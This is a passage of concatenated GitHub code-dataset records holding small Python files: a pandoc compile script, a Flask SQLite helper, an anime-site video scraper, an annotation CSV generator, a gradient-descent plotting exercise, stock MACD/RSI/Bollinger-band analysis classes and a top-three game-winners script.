(self.stdout, self.stderr) = process.communicate()\n self.stderr = self.stderr.decode('utf-8')\n process.wait()\n self.returncode = process.returncode\n\n\n","repo_name":"hooray1998/dotfiles","sub_path":"binary/trash-cli/integration_tests/test_trash_rm_script.py","file_name":"test_trash_rm_script.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"11054567489","text":"import os\nimport sys\nfrom pathlib import Path\n\ndirectory = Path(sys.argv[1]).resolve()\n\nfiles = sorted(((file, directory / (file.stem + \".pdf\"))\n for file in directory.iterdir()\n if file.suffix == \".md\"), key=lambda x: x[0].stat().st_mtime_ns, reverse=True)\n\nprint(f\"Compiling: {len(files)}\")\nfor input, output in files:\n print(f\"\\t{input}\")\n os.system(f'pandoc \"{input}\" -o \"{output}\"')\nprint(\"Done!\")\n","repo_name":"TWoolhouse/Slook","sub_path":"report/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72134311562","text":"import sqlite3\nfrom flask import g\n\n\nclass TableProvider:\n def __init__(self, db_path):\n self.db_path = db_path\n\n def query(self, sql):\n db = self.__get_db()\n rows = db.execute(sql)\n rows = [dict(row) for row in rows]\n columns = rows[0].keys()\n columns = [{'headerName': column, 'field': column} for column in columns]\n return (columns, rows)\n\n def __get_db(self):\n if 'db' not in g:\n g.db = sqlite3.connect(\n self.db_path,\n detect_types=sqlite3.PARSE_DECLTYPES\n )\n g.db.row_factory = sqlite3.Row\n return g.db\n\n def teardown(self, error=None):\n db = g.pop('db', None)\n if db is not None:\n db.close()\n","repo_name":"mobikitinc/analyst","sub_path":"demos/dact/backend/table_provider.py","file_name":"table_provider.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"21714356761","text":"#!/usr/bin/env 
python3\n# -*- coding: UTF-8 -*-\n\nimport os\nimport string\nimport urllib.request\nimport mechanize\nimport pandas as pd\nimport demjson\n\nfrom percache import Cache\nfrom urllib.parse import urlencode, urlparse, urlunparse, quote_plus\nfrom bs4 import BeautifulSoup\nfrom fuzzywuzzy import fuzz\n\nfrom shikimori.models import AnimeVideo\n\nfrom parsers import ongoings\nfrom parsers import parser, misc, tools\nfrom parsers.parser import MEDIA_KIND_VIDEOS, MEDIA_KIND_TORRENTS\nDATE_FORMAT = parser.DATE_FORMAT\n\nclass AnilibriaParser(parser.Parser):\n\theaders = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.1144'}\n\n\turl_to_embed = lambda self, url: self.build_url(path = url.replace(\"]//\", \"]https://\"))\n\tget_quality = lambda self, url: (\"%dp\" % max([int(i.split(\"[\")[-1].split(\"]\")[0][:-1]) for i in url.split(\",\")]))\n\tname_match_threshold = 93\n\n\tsupported_media_kinds = [MEDIA_KIND_VIDEOS]\n\n\tdef __init__(self, query_parameter = \"search\", fetch_latest_episode = True):\n\t\tself.scheme = \"https\"\n\t\tself.netloc = \"www.anilibria.tv\"\n\t\tself.fetch_latest_episode = fetch_latest_episode\n\t\tpath = \"/public/search.php\"\n\t\turl = urllib.parse.urlunparse((self.scheme, self.netloc, path, None, None, None))\n\t\tmain_url = urllib.parse.urlunparse((self.scheme, self.netloc, \"\", None, None, None))\n\t\tquery_kwargs = {query_parameter: \"%s\"}\n\n\t\tsuper().__init__(url = url, main_url = main_url, headers = self.headers, query_kwargs = query_kwargs, query_parameter = query_parameter)\n\t\tself.setup_urlopener()\n\n\tdef _find_best_match(self, resp, anime_names):\n\t\tpage = BeautifulSoup(resp, features = \"html5lib\")\n\t\turls = page.find_all(\"a\")\n\t\tif not urls:\n\t\t\treturn\n\n\t\tresults = {a.find(\"span\").text: a.get(\"href\") for a in urls}\n\t\tprint(results)\n\t\tbest_score = 0\n\t\tbest_result = None\n\t\tprint(\"_find_best_match: names: %s\" % str(anime_names))\n\n\t\tfor name in anime_names:\n\t\t\tprint(\"_find_best_match: name: %s\" % name)\n\n\t\t\tfor k, v in results.items():\n\t\t\t\tscore = fuzz.ratio(name, k)\n\t\t\t\tprint(\"%s: name: %s, score=%d\" % (name, k, score))\n\t\t\t\tif score > best_score:\n\t\t\t\t\tbest_score = score\n\t\t\t\t\tbest_result = v\n\t\t\t\t\tprint(\"%s: score=%d\" % (best_result, best_score))\n\n\t\tif not best_result:\n\t\t\treturn\n\n\t\tif best_score < self.name_match_threshold:\n\t\t\tprint(\"%s has score %d, rejecting\" % (str(best_result), best_score))\n\t\t\tbest_result = None\n\n\t\treturn best_result\n\tdef search_anime(self, anime_english, anime_aliases = [], type_ = \"\"):\n\t\tnames = [anime_english]\n\t\tres = []\n\t\tanime_page_url = \"\"\n\t\t#print(\"%s aliases = %s\" % (anime_english, misc.FORCE_ALIASES[\"anilibria\"][anime_english]))\n\n\t\tif anime_english in misc.FORCE_ALIASES[\"anilibria\"]:\n\t\t\tfor a in misc.FORCE_ALIASES[\"anilibria\"][anime_english]:\n\t\t\t\tif not a.endswith(\".html\"):\n\t\t\t\t\tnames += [a]\n\t\t\t\telse:\n\t\t\t\t\tprint(\"release = %s\" % a)\n\t\t\t\t\tanime_page_url = a\n\n\t\t#print(anime_page_url)\n\n\t\tfound = (anime_page_url != \"\")\n\t\tif anime_page_url:\n\t\t\ttry:\n\t\t\t\t#print(anime_page_url)\n\t\t\t\tres = self.browser_open(self.build_url(path = anime_page_url))\n\t\t\texcept RuntimeError:\n\t\t\t\ttools.catch()\n\n\t\t\ttry:\n\t\t\t\tpage_name = \"%s.html\" % names[0]\n\t\t\t\tpage_data = res.get_data()\n\t\t\t\tself.save_page(page_name, 
page_data)\n\n\t\t\t\treturn page_data\n\t\t\texcept:\n\t\t\t\ttools.catch()\n\n\t\tprint(\"anilibria: search_anime: anime_english=%s, anime_aliases=%s, names=%s\" % (anime_english, str(anime_aliases), str(names)))\n\t\tfor anime_name in names:\n\t\t\tpage_name = \"%s.html\" % anime_name\n\t\t\tpage_data = self.load_page(page_name)\n\t\t\tprint(anime_name)\n\t\t\tif not page_data:\n\t\t\t\tprint(\"!page_data\")\n\t\t\t\ttry:\n\t\t\t\t\tbuilt_url, query_kwargs = self.build_search_url(anime_name, method = \"POST\")\n\t\t\t\t\tres = self.browser_open(built_url, method = \"POST\", data = query_kwargs)\n\t\t\t\texcept RuntimeError:\n\t\t\t\t\ttools.catch()\n\t\t\t\t\tcontinue\n\t\t\t\tresp = res.read()\n\n\t\t\t\tif not resp:\n\t\t\t\t\tself.save_page(page_name, b\"\")\n\t\t\t\t\tprint(\"!resp\")\n\t\t\t\t\tcontinue\n\n\t\t\t\ttry:\n\t\t\t\t\tresp = demjson.decode(resp)\n\t\t\t\texcept:\n\t\t\t\t\ttools.catch()\n\t\t\t\t\tcontinue\n\n\t\t\t\tif not \"err\" in resp or not \"mes\" in resp or resp[\"err\"] != \"ok\":\n\t\t\t\t\tprint(\"resp is not ok\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tresp_data = resp[\"mes\"]\n\t\t\t\tif not resp_data and not anime_page_url:\n\t\t\t\t\tprint(\"!resp_data\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tif not anime_page_url:\n\t\t\t\t\tanime_page_url = self._find_best_match(resp_data, anime_names = anime_aliases)\n\n\t\t\t\tprint(\"search: anime_page_url=%s\" % anime_page_url)\n\t\t\t\tif not anime_page_url:\n\t\t\t\t\tprint(\"!anime_page_url\")\n\t\t\t\t\tcontinue\n\t\t\t\ttry:\n\t\t\t\t\t#print(anime_page_url)\n\t\t\t\t\tres = self.browser_open(self.build_url(path = anime_page_url))\n\t\t\t\texcept RuntimeError:\n\t\t\t\t\ttools.catch()\n\t\t\t\t\tcontinue\n\n\t\t\tfound = True\n\t\t\tbreak\n\n\t\tif not found:\n\t\t\treturn None\n\n\t\ttry:\n\t\t\tif (not page_data) and res:\n\t\t\t\tpage_data = res.get_data()\n\t\t\t\tself.save_page(page_name, page_data)\n\t\texcept:\n\t\t\ttools.catch()\n\t\t\treturn None\n\n\t\treturn page_data\n\n\t@Cache(prefix=\"AnilibriaParser\")\n\tdef parse_anime_page(self, anime_english, type_ = \"\"):\n\t\tanime_page = self.search_anime(anime_english, type_)\n\t\tif not anime_page:\n\t\t\tprint(\"parse_anime_page: not found\")\n\t\t\treturn self.handler_anime_not_found(anime_english)\n\n\t\tcontent_main = BeautifulSoup(anime_page, features = \"html5lib\")\n\t\t\n\t\tauthors = \"[Anilibria]\"\n\t\trelease_info = content_main.find(\"div\", {\"id\": \"xreleaseInfo\"})\n\t\tif release_info:\n\t\t\trelease_info = list(release_info.strings)\n\t\t\tif 'Озвучка:' in release_info:\n\t\t\t\ttry:\n\t\t\t\t\tdubbers = release_info[release_info.index('Озвучка:') + 1].lstrip()\n\t\t\t\t\tdubbers = \" & \".join(dubbers.split(\", \"))\n\t\t\t\t\tauthors += \"(%s)\" % dubbers\n\n\t\t\t\texcept IndexError:\n\t\t\t\t\ttools.catch()\n\t\t\n\n\t\tvideos = {}\n\t\tvideos_start_idx = anime_page.find(b\"new Playerjs(\")\n\t\tif videos_start_idx < 0:\n\t\t\treturn authors, videos\n\n\t\tvideos_end_idx = anime_page.find(b\"});\", videos_start_idx)\n\n\t\tif videos_end_idx < 0:\n\t\t\treturn authors, videos\n\n\t\tvideos_unparsed = anime_page[videos_start_idx + len(b\"new Playerjs(\"): videos_end_idx + 1]\n\n\t\ttry:\n\t\t\tvideos = {int(f[\"id\"].split(\"s\")[-1]): f[\"file\"] for f in demjson.decode(videos_unparsed)[\"file\"]}\n\t\texcept:\n\t\t\ttools.catch()\n\n\t\treturn authors, videos\n\n\n\t@Cache(prefix=\"AnilibriaParser\")\n\tdef get_videos_list(self, anime_english, episode_num, type_ = \"\"):\n\t\texisting_video = AnimeVideo.query.filter(AnimeVideo.anime_english 
== anime_english, AnimeVideo.episode == episode_num, AnimeVideo.url.like(\"%libria%\")).first()\n\t\tif existing_video:\n\t\t\treturn self.handler_epidode_exists(anime_english, episode_num, existing_video.url)\n\n\t\ttry:\n\t\t\tobj = self.parse_anime_page(anime_english, type_)\n\t\t\tauthors, videos = obj\n\t\texcept:\n\t\t\t#print(\"parse_anime_page returned %s\" % str(obj))\n\t\t\traise\n\n\t\tif not episode_num in videos:\n\t\t\treturn self.handler_epidode_not_found(anime_english, episode_num)\n\n\t\tif not authors:\n\t\t\treturn self.handler_authors_not_found(anime_english)\n\n\t\tvideos_list = pd.DataFrame(columns = [\"url\", \"episode\", \"kind\", \"quality\", \"video_hosting\", \"language\", \"author\"])\n\n\t\tvideo_url = videos[episode_num]\n\t\tquality = \"unknown\"\n\t\ttry:\n\t\t\tquality = self.get_quality(video_url)\n\t\texcept:\n\t\t\ttools.catch()\n\n\t\tvideos_list = videos_list.append({\n\t\t\t\"url\": self.url_to_embed(video_url),\n\t\t\t\"episode\": str(episode_num),\n\t\t\t\"video_hosting\": self.netloc,\n\t\t\t\"author\": authors,\n\t\t\t\"quality\": quality,\n\t\t\t\"language\": \"russian\",\n\t\t\t\"kind\": self.to_db_kind[\"fandub\"]\n\t\t}, ignore_index = True)\n\n\t\treturn videos_list\n","repo_name":"PlayShikiApp/parsers","sub_path":"anilibria.py","file_name":"anilibria.py","file_ext":"py","file_size_in_byte":7355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"11446683410","text":"#!/usr/bin/env python\nimport argparse\nimport html\nimport json\nimport sys\n\nimport pandas as pd\n\nfrom lqam.annotations import QUESTIONS_PER_HIT\nfrom lqam.util.argparse_with_defaults import ArgumentParserWithDefaults\nfrom lqam.util.file_utils import cached_path\nfrom lqam.util.iterable_utils import chunks\n\n\ndef parse_args() -> argparse.Namespace:\n parser = ArgumentParserWithDefaults()\n parser.add_argument(\"questions_path_or_url\", metavar=\"QUESTIONS_JSON_FILE_OR_URL\", nargs=\"?\", default=\"-\")\n parser.add_argument(\"--questions-per-hit\", type=int, default=QUESTIONS_PER_HIT)\n args = parser.parse_args()\n\n args.input = sys.stdin if args.questions_path_or_url == \"-\" else cached_path(args.questions_path_or_url)\n\n return args\n\n\ndef main() -> None:\n args = parse_args()\n\n with open(args.questions_path_or_url) as file:\n instances = json.load(file)\n\n hits_df = pd.DataFrame([\n {\n k: v\n for i, instance in enumerate(hit_instances, start=1)\n for k, v in [(f\"video{i}_id\", instance[\"video_id\"]),\n (f\"video{i}_start_time\", instance[\"video_start_time\"]),\n (f\"video{i}_end_time\", instance[\"video_end_time\"]),\n # We escape the HTML because it could have quotes and so break the JS or HTML code and the\n # page not work at all:\n (f\"question{i}\", html.escape(instance[\"masked_caption\"])),\n (f\"label{i}\", instance[\"label\"])]\n }\n for hit_instances in chunks(instances, args.questions_per_hit)\n ])\n\n print(hits_df.to_csv(index=False), end=\"\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MichiganNLP/video-fill-in-the-blank","sub_path":"scripts/generate_annotation_input.py","file_name":"generate_annotation_input.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"6206603759","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef function(x1, x2):\n return 3/2*x1*x1 + 3/2*x2*x2 + x1*x2 + x1 + 2*x2 +2\n\ndef dfx1(x1, x2):\n return 3*x1 + x2 + 1\n\ndef 
dfx2(x1, x2):\n    return 3*x2 + x1 + 2\n\ndef dx1(gamma,xd_old,a,g):\n    return gamma * xd_old[0] -(1-gamma)*a*g[0]\n\ndef dx2(gamma,xd_old,a,g):\n    return gamma * xd_old[1] -(1-gamma)*a*g[1]\n\n\ndef Main():\n    g=[0,0]\n    dx=[0,0]\n    x_new=[0,0]\n    a=0.5\n    gamma=0.1\n    h=1.5\n    r=0.5\n    z=0.04\n\n    #Create vector x for x0 = 0.5\n    x = [-2 ,-1.5]\n    xd_old=[0,0]\n\n    for i in range(2):\n\n        fx=function(x[0],x[1])\n\n        g[0]=dfx1(x[0],x[1])\n        g[1]=dfx2(x[0],x[1])\n\n        dx[0]=dx1(gamma,xd_old,a,g)\n        dx[1]=dx2(gamma,xd_old,a,g)\n\n        x_new[0]=x[0]+dx[0]\n        x_new[1]=x[1]+dx[1]\n\n        fx_new=function(x_new[0],x_new[1])\n        print(fx_new)\n        \n        if fx_new > fx * z:\n            x_new=x\n            a=r*a\n            gamma=0\n        elif fx_new < fx:\n            x=x_new\n            a=h*a\n            gamma=0.1\n        else :\n            x=x_new\n            gamma=0.1\n        \n        xd_old=dx\n\n        print (f\"x{i} = {x}\")\n    fig = plt.figure(figsize=(6,5))\n    left, bottom, width, height = 0.1, 0.1, 0.8, 0.8\n    ax = fig.add_axes([left, bottom, width, height]) \n\n    start, stop, n_values = -8, 8, 800\n\n    x_vals = np.linspace(start, stop, n_values)\n    y_vals = np.linspace(start, stop, n_values)\n    X, Y = np.meshgrid(x_vals, y_vals)\n\n\n    Z = 3/2*X*X + 3/2*Y*Y + X*Y + X + 2*Y +2\n\n    cp = plt.contourf(X, Y, Z)\n    plt.colorbar(cp)\n\n    ax.set_title('Contour Plot')\n    ax.set_xlabel('x (cm)')\n    ax.set_ylabel('y (cm)')\n    plt.show()\n\n\n\nif __name__ == \"__main__\":\n    Main()\n","repo_name":"kostaskon7/ML-Neural-Network","sub_path":"hw2_2546_2631/code/ask8.py","file_name":"ask8.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29238876028","text":"import yfinance as yf\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport tqdm\r\n\r\n## Classes and Functions\r\n\r\nclass StockRSI():\r\n    '''Relative strength index'''\r\n    def __init__(self, name, period):\r\n        self.stock = StockInfo(name, period)\r\n        self.hist = self.stock.hist\r\n        self.get_RSI()\r\n\r\n    def get_RSI(self, N=14):\r\n        self.rsi_df = pd.DataFrame()\r\n        self.rsi_df['change'] = [0]*len(self.hist['Close'])\r\n\r\n        self.rsi_df['change'] = (self.hist['Close'] - self.hist['Close'].shift(1)).values\r\n        self.rsi_df = pd.concat((self.rsi_df[self.rsi_df>0], self.rsi_df[self.rsi_df<0]), axis=1).fillna(0).abs()\r\n        self.rsi_df.columns = ['gain', 'loss']\r\n        self.rsi_df[['avg gain', 'avg loss']] = np.zeros((len(self.rsi_df), 2))\r\n\r\n        self.rsi_df['avg gain'][:N] = self.rsi_df['gain'].iloc[:N].mean()\r\n        self.rsi_df['avg loss'][:N] = abs(self.rsi_df['loss'].iloc[:N].mean())\r\n\r\n        for i, (idx, row) in enumerate(self.rsi_df.iloc[N:].iterrows(), N):\r\n            self.rsi_df['avg gain'][i] = ((self.rsi_df.iloc[i-1]['avg gain']*(N-1)) + self.rsi_df.iloc[i]['gain'])/N\r\n            self.rsi_df['avg loss'][i] = abs(((self.rsi_df.iloc[i-1]['avg loss']*(N-1)) + self.rsi_df.iloc[i]['loss'])/N)\r\n\r\n        self.rsi_df['RS'] = self.rsi_df['avg gain'] / self.rsi_df['avg loss']\r\n        self.rsi_df['RSI'] = 100 - (100 / (1 + self.rsi_df['RS']))\r\n\r\n        return self.rsi_df\r\n\r\n    def plot_RSI(self):\r\n        plt.plot(self.hist.index, self.rsi_df['RSI'])\r\n        plt.xticks(rotation=45)\r\n        plt.axhline(40, c='k', linestyle='--')\r\n        plt.axhline(70, c='k', linestyle='--')\r\n        plt.show()\r\n\r\n\r\n\r\nclass StockInfo():\r\n    ''' Get stock info and EMA values'''\r\n    def __init__(self, name, period='5y'):\r\n        self.name = name\r\n        self.stock = yf.Ticker(name)\r\n        self.hist = self.stock.history(period=period)\r\n    \r\n    def get_ema(self, N, series):\r\n        k = 2/(N+1)\r\n        ema = 
np.ones(series.shape)*series.mean()\r\n ema[:N] = series.values[:N].mean()\r\n for i, _ in enumerate(series.iloc[N:], N):\r\n ema[i] = (series.iloc[i]*k) + (ema[i-1] * (1-k))\r\n return ema\r\n\r\n def plot(self, series):\r\n for N in [8, 50, 200]:\r\n col_name = 'ema_' + str(N)\r\n self.hist[col_name] = self.get_ema(N, series)\r\n self.hist[col_name].plot()\r\n series.plot()\r\n plt.legend()\r\n plt.show()\r\n\r\n def buy_hold_returns(self, invest_val=100000):\r\n num_stocks = math.floor(invest_val/self.hist['Close'][0])\r\n buy_hold_ret = (self.hist['Close'][-1] - self.hist['Close'][0])*num_stocks\r\n percnt_return = (buy_hold_ret/invest_val)*100\r\n print('\\nGains from the Buy-Hold strategy: {}, with %: {} \\n'.format(buy_hold_ret, percnt_return))\r\n return buy_hold_ret, percnt_return\r\n\r\n \r\nclass MACD():\r\n def __init__(self, name, period, fast=12, slow=26, smooth=9):\r\n self.name = name\r\n self.fast = fast\r\n self.slow = slow\r\n self.smooth = smooth\r\n self.stock = StockInfo(name, period)\r\n self.hist = self.stock.hist\r\n self.stock_rsi = StockRSI(name, period)\r\n self.get_macd()\r\n self.implement_macd_strategy()\r\n\r\n def get_macd(self):\r\n self.hist['ema_fast'] = self.stock.get_ema(self.fast, self.hist['Close'])\r\n self.hist['ema_slow'] = self.stock.get_ema(self.slow, self.hist['Close'])\r\n\r\n self.hist['macd'] = self.hist['ema_fast'] - self.hist['ema_slow']\r\n self.hist['signal'] = self.hist['macd'].ewm(span=self.smooth, adjust=False).mean()\r\n self.hist['histo'] = self.hist['macd'] - self.hist['signal']\r\n return\t\r\n\r\n \r\n # def plot(self):\r\n # # self.get_macd()\r\n # self.hist['macd'][-100:].plot()\r\n # self.hist['signal'][-100:].plot()\r\n # plt.legend()\r\n # plt.show()\r\n\r\n def implement_macd_strategy(self): \r\n self.buy_price = np.ones(self.hist['Close'].shape) * np.nan\r\n self.sell_price = np.ones(self.hist['Close'].shape) * np.nan\r\n self.macd_flag = np.zeros(self.hist['Close'].shape)\r\n self.position = np.zeros(self.hist['Close'].shape)\r\n flag = 0\r\n\r\n for i in range(len(self.hist['macd'])):\r\n if self.hist['macd'][i] > self.hist['signal'][i]:\r\n if flag != 1:\r\n self.buy_price[i] = self.hist['Close'][i]\r\n flag = 1\r\n self.macd_flag[i] = flag\r\n elif self.hist['macd'][i] < self.hist['signal'][i]:\r\n if flag != -1:\r\n self.sell_price[i] = self.hist['Close'][i]\r\n flag = -1\r\n self.macd_flag[i] = flag\r\n\r\n ## Get Positions\r\n for i in range(self.position.shape[0]):\r\n if self.macd_flag[i] == 1:\r\n self.position[i] = 1\r\n elif self.macd_flag[i] == -1:\r\n self.position[i] = 0\r\n else:\r\n self.position[i] = self.position[i-1] \r\n\r\n self.position_change = np.diff(self.position, prepend=self.position[0])\r\n self.decision = np.where(self.position_change>0, 'buy', \r\n np.where(self.position_change<0, 'sell',\r\n 'hold')) \r\n return \r\n\r\n def plot(self, num=100, buy_price=None, sell_price=None, flag=False):\r\n plt.figure(figsize=(12,8))\r\n ax1 = plt.subplot2grid((10,1), (0,0), rowspan = 5, colspan = 1)\r\n ax2 = plt.subplot2grid((10,1), (5,0), rowspan = 3, colspan = 1)\r\n\r\n ax1.plot(self.hist['Close'][-num:])\r\n if flag == True:\r\n ax1.plot(self.hist['Close'].index[-num:], buy_price[-num:], marker = '^', color = 'green', \r\n markersize = 10, label = 'BUY SIGNAL', linewidth = 0)\r\n ax1.plot(self.hist['Close'].index[-num:], sell_price[-num:], marker = 'v', color = 'r', \r\n markersize = 10, label = 'SELL SIGNAL', linewidth = 0)\r\n ax1.legend()\r\n\r\n ax1.set_title(self.name, fontsize=25.0, 
color='b')\r\n ax1.text(0.2, 0.8, 'RSI = {}'.format(int(self.stock_rsi.rsi_df['RSI'].iloc[-1])), \r\n fontsize=20.0, transform=ax1.transAxes)\r\n\r\n ax2.plot(self.hist['macd'][-num:], color = 'grey', linewidth = 1.5, label = 'MACD')\r\n ax2.plot(self.hist['signal'][-num:], color = 'skyblue', linewidth = 1.5, label = 'SIGNAL')\r\n\r\n start = len(self.hist['Close']) - num\r\n for i in range(start, len(self.hist['Close'])):\r\n if str(self.hist['histo'][i])[0] == '-':\r\n ax2.bar(self.hist['Close'].index[i], self.hist['histo'][i], color = '#ef5350')\r\n else:\r\n ax2.bar(self.hist['Close'].index[i], self.hist['histo'][i], color = '#26a69a')\r\n\r\n plt.legend()\r\n plt.show()\r\n\r\n def get_returns(self, invest_val=100000):\r\n num_stocks = math.floor(invest_val/self.hist['Close'][0])\r\n\r\n self.hist['daily_return'] = self.hist['Close'].diff().fillna(0)\r\n self.hist['macd_return'] = self.hist['daily_return'].shift(-1).fillna(0) * self.position\r\n\r\n total_return = np.sum((self.hist['macd_return']*num_stocks).values)\r\n percnt_return = (total_return/invest_val)*100\r\n print('\\nGains from the MACD strategy: {}, with %: {} \\n'.format(total_return, percnt_return))\r\n\r\n return total_return, num_stocks, percnt_return\r\n\r\n\r\n\r\nclass BollingerBands():\r\n def __init__(self, name, period, window, nb_stddev=2):\r\n self.name = name\r\n self.period = period\r\n self.window = window\r\n self.nb_stddev = nb_stddev\r\n self.stock = StockInfo(name, period)\r\n self.hist = self.stock.hist\r\n self.get_bb()\r\n self.implement_strategy()\r\n\r\n def get_bb(self):\r\n std = self.hist['Close'].rolling(self.window).std()\r\n self.hist['middle_bb'] = self.hist['Close'].rolling(self.window).mean()\r\n self.hist['upper_bb'] = self.hist['middle_bb'] + std * self.nb_stddev\r\n self.hist['lower_bb'] = self.hist['middle_bb'] - std * self.nb_stddev\r\n return \r\n\r\n def implement_strategy(self): \r\n trace = self.hist['Close']\r\n buy_limit = self.hist['lower_bb']\r\n sell_limit = self.hist['upper_bb']\r\n self.buy_price = np.ones(self.hist['Close'].shape) * np.nan\r\n self.sell_price = np.ones(self.hist['Close'].shape) * np.nan\r\n self.bb_flag = np.zeros(self.hist['Close'].shape)\r\n self.position = np.zeros(self.hist['Close'].shape)\r\n flag = 0\r\n\r\n for i in range(len(self.hist['upper_bb'])):\r\n if trace[i] < buy_limit[i]:\r\n # if flag != 1:\r\n self.buy_price[i] = self.hist['Close'][i]\r\n flag = 1\r\n self.bb_flag[i] = flag\r\n elif trace[i] > sell_limit[i]:\r\n # if flag != -1:\r\n self.sell_price[i] = self.hist['Close'][i]\r\n flag = -1\r\n self.bb_flag[i] = flag\r\n\r\n ## Get Positions\r\n for i in range(self.position.shape[0]):\r\n if self.bb_flag[i] == 1:\r\n self.position[i] = 1\r\n elif self.bb_flag[i] == -1:\r\n self.position[i] = 0\r\n else:\r\n self.position[i] = self.position[i-1] \r\n\r\n self.position_change = np.diff(self.position, prepend=self.position[0])\r\n self.decision = np.where(self.position_change>0, 'buy', \r\n np.where(self.position_change<0, 'sell',\r\n 'hold'))\r\n return\r\n\r\n def plot(self, num=100, buy_price=None, sell_price=None, flag=True):\r\n plt.figure(figsize=(12,8))\r\n ax1 = plt.subplot2grid((10,1), (0,0), rowspan = 5, colspan = 1)\r\n\r\n ax1.plot(self.hist['Close'][-num:])\r\n ax1.plot(self.hist['middle_bb'][-num:], linewidth=0.5, color='m', linestyle='dashed', dashes=(10, 10))\r\n ax1.plot(self.hist['upper_bb'][-num:], linewidth=0.5, color='m')\r\n ax1.plot(self.hist['lower_bb'][-num:], linewidth=0.5, color='m')\r\n if flag == True:\r\n 
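# overlay trade markers on the price curve: green '^' where the strategy signalled a buy, red 'v' where it signalled a sell\r\n            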
ax1.plot(self.hist['Close'].index[-num:], self.buy_price[-num:], marker = '^', color = 'green', \r\n markersize = 10, label = 'BUY SIGNAL', linewidth = 0)\r\n ax1.plot(self.hist['Close'].index[-num:], self.sell_price[-num:], marker = 'v', color = 'r', \r\n markersize = 10, label = 'SELL SIGNAL', linewidth = 0)\r\n ax1.legend()\r\n\r\n ax1.set_title(self.name, fontsize=25.0, color='b')\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\n def get_returns(self, invest_val=100000):\r\n num_stocks = math.floor(invest_val/self.hist['Close'][0])\r\n\r\n self.hist['daily_return'] = self.hist['Close'].diff().fillna(0)\r\n self.hist['bb_return'] = self.hist['daily_return'].shift(-1).fillna(0) * self.position\r\n\r\n total_return = np.sum((self.hist['bb_return']*num_stocks).values)\r\n percnt_return = (total_return/invest_val)*100\r\n print('\\nGains from the BB strategy: {}, with %: {} \\n'.format(total_return, percnt_return))\r\n\r\n return total_return, num_stocks, percnt_return\r\n\r\n\r\n####-------------------\r\n\r\ndef get_decision(dict1, timeframe=5):\r\n decision_df = pd.DataFrame(dict1)\r\n ## Selecting shares which have Buy or Sell call\r\n decision_df = decision_df.loc[:, (decision_df != 'hold').any(axis=0)]\r\n decision_df.index = ['day -{}'.format(t) for t in range(timeframe, 0, -1)]\r\n return decision_df\r\n\t\r\ndef color_func(val):\r\n color = 'green' if val == 'buy' else 'red' if val == 'sell' else 'yellow'\r\n return 'background-color: {}'.format(color)\t\r\n\r\ndef plot_returns(dict1, dict2, label1='macd', label2='buy_hold'):\r\n plt.figure(figsize=(12,6))\r\n x1, y1 = zip(*list(dict1.items()))\r\n plt.plot(x1, y1, '.-', label=label1)\r\n x2, y2 = zip(*list(dict2.items()))\r\n plt.plot(x2, y2, '.-', label=label2)\r\n plt.xticks(rotation=90)\r\n plt.legend()\r\n plt.grid(visible=True)\r\n plt.ylabel('Percentage Returns %', fontdict={'size':16})\r\n plt.show()\r\n return\r\n\r\n###============ \r\n\r\n# period = '2y'\r\n\r\n# # stock_rsi = StockRSI('AFFLE.NS', period)\r\n# # stock_rsi.get_RSI(stock_rsi.hist['Close'])\r\n# # stock_rsi.plot_RSI()\r\n\r\n# stock = StockInfo('AFFLE.NS', period)\r\n# stock.buy_hold_returns()\r\n# # stock.plot(stock.hist['Close'])\r\n\r\n# macd = MACD('AFFLE.NS', period, 12, 26, 9)\r\n# macd.plot()\r\n# macd.get_returns()\r\n","repo_name":"gauravsa123/stocks","sub_path":"macd_functions.py","file_name":"macd_functions.py","file_ext":"py","file_size_in_byte":12626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"38825845035","text":"def get_winner(*point_of_gamers):\n board_of_gamers = []\n for index, gamers in enumerate(points_of_gamers):\n list_of_gamers = gamers, index+1\n board_of_gamers.append(list_of_gamers)\n sort_gamers = sorted(board_of_gamers, reverse=True)\n winners = sort_gamers[0:3]\n number_of_winner = [number_of_winner[1] for number_of_winner in winners]\n return number_of_winner\n\n\npoints_of_gamers = [599, 67, 94, 87, 6, 44]\n# Вариант если очки игроков вводить с консоли\n# points_of_gamers = list(map(int, input('Введите очки\\\n# игроков от 0 до 600 через пробел\\\n# и нажмите Enter ').split(' ')))\nwinners = get_winner(points_of_gamers)\nprint(f'Номера победителей {winners}')\n","repo_name":"NikitaMogilev/homeworks","sub_path":"homework7/task_7_1.py","file_name":"task_7_1.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39897256451","text":"import unittest\nimport 
